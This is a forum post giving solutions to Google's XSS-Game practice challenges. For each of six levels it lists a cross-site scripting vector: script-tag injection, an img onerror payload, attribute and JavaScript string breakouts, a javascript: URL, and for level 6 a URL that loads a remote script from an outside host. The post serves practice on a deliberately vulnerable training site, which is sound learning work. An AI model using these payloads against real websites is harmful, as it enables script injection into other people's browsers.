Google's XSS-Game Solutions

x32x01
  • by x32x01 ||
Below are the solutions to Google XSS challenges hosted on https://xss-game.appspot.com

Level 1: Hello, world of XSS​

Query https://xss-game.appspot.com/level1/frame?query=<script>alert(1)</script>
Vector <script>alert(1)</script>

Level 2: Persistence is key​

Vector "><img src=x onerror=alert(1)>

Level 3: That sinking feeling...​

Query https://xss-game.appspot.com/level3/frame#'/><script>alert(1)</script>
Vector '/><script>alert(1)</script>

Level 4: Context matters​

Query https://xss-game.appspot.com/level4/frame?timer=1');alert('1
Vector 1')%3Balert('1

Level 5: Breaking protocol​

Query https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)
Vector javascript:alert(1)

Follow the White Rabbit
Query https://xss-game.appspot.com/level6/frame#HTTPS://dj-infosec.divshot.io/content.js
Vector HTTPS://dj-infosec.divshot.io/content.js
 
Last edited:
Related Threads
x32x01
Replies
0
Views
177
x32x01
x32x01
x32x01
Replies
1
Views
377
Mostafa
M
x32x01
Replies
0
Views
547
x32x01
x32x01
x32x01
Replies
0
Views
48
x32x01
x32x01
x32x01
Replies
0
Views
469
x32x01
x32x01
TAGs: Tags
cross-site scripting xss xss game
Register & Login Faster
Forgot your password?
Forum Statistics
Threads
724
Messages
729
Members
70
Latest Member
blak_hat
Back
Top